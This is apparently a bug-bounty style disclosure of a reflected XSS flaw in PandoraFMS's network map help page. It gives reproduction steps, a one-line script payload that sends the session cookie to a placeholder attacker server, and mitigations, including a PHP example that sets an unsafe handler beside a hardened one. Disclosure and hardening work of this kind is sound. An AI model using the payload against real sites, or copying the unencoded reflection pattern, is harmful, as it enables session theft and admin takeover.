Reflected Cross Site Scripting leading to session hijacking in pandorafms/pandorafms
Reported on
Nov 1st 2022
Description
Basic XSS:
XSS (Cross-Site Scripting) vulnerabilities arise when untrusted data gets interpreted as code in a web context. A successful XSS attack effectively lets the attacker act as the logged-in target user, and it can additionally be used to trick the user into handing information (such as their password) to the attacker, or into downloading and executing malware on the user's workstation.
Steps to reproduce:
- Capture the request sent when hitting the help button on "http://localhost:8080/pandora_console/index.php?sec=network&sec2=operation/agentes/pandora_networkmap" (as shown in the PoC).
- Add the payload to the "b" parameter of the request.
- Copy the URL with the payload in it and send it to a user logged in as admin.
- When the admin user visits the malicious link, the payload is executed.
- The session cookie is sent to the attacker-controlled server.
- Once the cookie is obtained, it can be used to log in as admin.
Proof of Concept
Payload Used:
<script>alert(document.cookie);var i=new Image;i.src="http://attacker_controlled_server/?"+document.cookie;</script>
POC Link:
https://drive.google.com/drive/folders/1DjGrBii9wGWews19vFkesCgLIqlJZivP?usp=sharing
Impact
An attacker can obtain any user's session cookie using this vulnerability and log into that user's session. If the attacker obtains the session of an admin user, they have full access to the application and can even delete users.
Mitigation:
- Generate HTML safely using a templating engine, or use a static JavaScript frontend to avoid HTML generation altogether.
- If you display untrusted HTML content on your website, purify it first and contain it in a sandboxed frame.
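As an added illustration of the first mitigation (example code, not PandoraFMS's own): a hypothetical PHP handler that reflects a "b" parameter, shown in its unsafe form beside the hardened one, together with cookie and CSP hardening against the cookie-theft impact described in this report. The function names and the "Help topic" markup are assumptions.

```php
<?php
// Added example, not PandoraFMS code: a hypothetical help-page handler.

// Unsafe: the raw query parameter is interpolated straight into HTML, so a
// value containing markup (e.g. a <script> block) is interpreted by the browser.
function render_unsafe(string $b): string {
    return "<p>Help topic: $b</p>";
}

// Hardened: encode for the HTML text context. ENT_QUOTES also covers attribute
// contexts, ENT_SUBSTITUTE avoids silently dropping invalid sequences, and an
// explicit charset avoids encoding-mismatch bypasses.
function render_safe(string $b): string {
    $encoded = htmlspecialchars($b, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return "<p>Help topic: $encoded</p>";
}

// Defence in depth against session hijacking: HttpOnly keeps the session id out
// of document.cookie, and a CSP without 'unsafe-inline' blocks injected inline
// scripts while img-src 'self' blocks image-based exfiltration to other hosts.
function send_hardening_headers(): void {
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Lax',
    ]);
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; img-src 'self'");
}

// Self-check with a constructed input containing markup: the hardened output
// must never contain an unescaped "<script" sequence.
$probe = '<script>alert(1)</script>';
if (strpos(render_safe($probe), '<script') !== false) {
    throw new RuntimeException('output encoding failed');
}

send_hardening_headers();
session_start();
echo render_safe($_GET['b'] ?? '');
```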
Pandora is a CNA and they usually assign CVEs before public disclosure if the report portrays a valid vulnerability :)